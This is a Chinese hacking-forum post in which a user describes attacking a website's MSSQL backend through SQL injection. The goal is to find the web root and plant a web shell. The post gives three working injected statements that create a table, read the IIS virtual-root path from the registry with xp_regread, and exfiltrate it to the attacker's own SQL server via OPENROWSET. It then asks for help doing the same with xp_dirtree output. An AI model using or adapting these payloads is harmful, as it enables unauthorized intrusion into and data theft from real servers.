[讨论]SQL注入屏蔽错误提示找路径的一些问题 SQL, 路径, 提示, 讨论

2000gaobo

[讨论]SQL注入屏蔽错误提示找路径的一些问题
议题作者：圣堂骑士
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

一个注入。MSSQL的DB权限
本想列目录写一句话
结果拿给阿D跑，发现无法列目录，手工提交发现是屏蔽了错误显示
想用openrowset连接本机mssql得路径
然后在对方机器上建立个表
1.create table [dbo].[fenggou]([cha8][char](255))--
2.DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
3.DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM fenggou) exec (@a1);--

最后在本机没有读出路径。怀疑是注册表做了改动
所以问题来了，我想问下。能否运用同样的方法将xp_dirtree读出的数据。通过本地SQL跟踪器查看到
如果能的话。希望能写写语句。因为小弟太菜构造了半天也没构造出来
希望大牛们帮帮忙。


帖子13 精华0 积分48 阅读权限40 性别男 在线时间12 小时 注册时间2007-5-6 最后登录2008-3-30 查看个人网站
查看详细资料引用 报告 回复 TOP 少女暴富的隐秘（图）

gxm
荣誉会员